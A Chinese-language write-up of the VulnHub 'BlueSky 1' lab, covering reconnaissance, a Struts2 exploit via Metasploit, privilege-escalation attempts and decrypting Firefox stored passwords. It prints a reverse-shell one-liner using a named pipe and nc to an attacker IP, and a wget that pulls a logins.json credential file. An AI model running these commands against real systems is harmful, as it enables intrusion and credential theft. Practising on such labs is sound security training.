靶場地址:https://www.vulnhub.com/entry/bluesky-1,623/
writeup 參考:https://zhuanlan.zhihu.com/p/353633797
簡介
總結:
-
dirsearch 字典中沒有框架信息,例如 struts2-showcase 目錄。所以就不知道有這個框架。
在 github 常見字典沒找到。
burp scanner 也沒跑出來。
只能收集,添加。
-
獲取 shell 後,不知道哪些文件是敏感文件。
-
可以通過獲取 tomcat manage 密碼,部署 war shell。
-
火狐瀏覽器密碼解密。
https://github.com/lclevy/firepwd
lazagne 是一個集合,但必須直接上傳到目標網站運行。
-
通過 python 模塊傳遞文件。
python -m http.server 6666 wget http://192.168.200.132:6666/logins.json
-
新的反彈 shell 方式:
# target mknod /tmp/mypipe p /bin/bash 0</tmp/mypipe | nc 192.168.200.128 6666 1>/tmp/mypipe # me nc -lp 6666
探測端口及服務
首先,使用 nmap 掃描目標,看開放哪些端口。
發現開放兩個端口,再使用腳本探測其版本
尋找已知exp
openssh
searchsploit 搜索一下版本,看是否有什麼漏洞。
除了用戶名枚舉外,沒什麼值得注意的漏洞。此處可以嘗試弱口令,但不要抱太大希望,先放放,後面如果沒有思路可以嘗試嘗試。
tomcat
接下來搜索 tomcat 是否存在已知漏洞。
唯一有點關聯的就是這個,但下載下來仔細一看,版本不符合。
web 滲透
接下來進入網頁中嘗試看看有沒有什麼網頁功能可以利用。
先用 dirsearch 掃一下目錄,發現沒有多少值得注意的。
沒思路,看下 writeup ,說此處存在 struts2 框架。
看了下 dirsearch 字典,裏面的確沒有,掃不出來。
在網上找了一下是否有框架類字典,發現 SecLists 、 Fuzzdb 等主流字典中都沒有框架字典。
用 vulmap 掃是否存在 struts2 漏洞。
看來是存在漏洞,接下來直接利用。
先看 msf 中是否有exp,有,就直接利用。若沒有,則用searchsploit 。
設置完成後直接運行。成功獲取 shell
提權
先使用命令查看基本信息,
uname -a
id
groups
cat /etc/passwd
只發現當前用戶在 sudo 組。
再看看當前用戶目錄下文件。
.bash_history
.sudo_as_admin_successful # 說明用戶有 sudo 權限。
.viminfo 其中有
/usr/local/tomcat/conf/tomcat-users.xml #有tomcat 用戶及密碼
根據這個密碼,如果tomcat 有高權限的話,一樣能幹事。嘗試 ps -ef | grep tomcat 看tomcat 是否以root 用戶運行?結果並非root
user.txt
提醒我們要獲取root 權限
使用 linPeas 提權輔助腳本
這個腳本等於集合了跟提權相關的探測命令。通過掃描,發現以下有用信息。
首先嚐試系統漏洞提權
搜索是否存在系統 exp ,本地運行 ./linux-exploit-suggester-2.pl -k 4.4.0
一個個嘗試,發現沒有符合的,看來只能嘗試其它方法了。
這裏有一個坑點,就是 明明 髒牛漏洞 只存在於 Linux Kernel 2.6.22 < 3.9 (x86/x64) 。
發現一個新項目,收錄最新的提權技術,不過需要自己嘗試編寫 exp https://github.com/xairy/linux-kernel-exploitation
既然系統漏洞提權是沒可能,那就從其它方面入手。
看 sudo 是否存在漏洞
失敗,因爲對方沒有安裝 gcc。
tomcat 是否以高權限用戶運行
有了 tomcat 密碼,如果 tomcat 是以高權限運行的話我們也能搞一些事情。
ps -ef | grep tomcat
結果只是以普通用戶運行。
幾個 passwd 文件
沒有什麼值得關注的。
第三方軟件提權
看是否因爲第三方軟件存在明顯漏洞。 vulmap
python3 /tmp/vulmap-linux.py
暈,居然python 版本爲 3.5 ,運行不了。。由於繼續處理下去有點麻煩。就先越過這步。。
火狐瀏覽器的敏感文件
當時第一次卡在這裏,然後看 writeup 說可以用工具獲取火狐密碼。
使用 https://github.com/lclevy/firepwd 來解密。
https://github.com/AlessandroZ/LaZagne 可以解密很多應用密碼。但是隻能上傳到目標系統。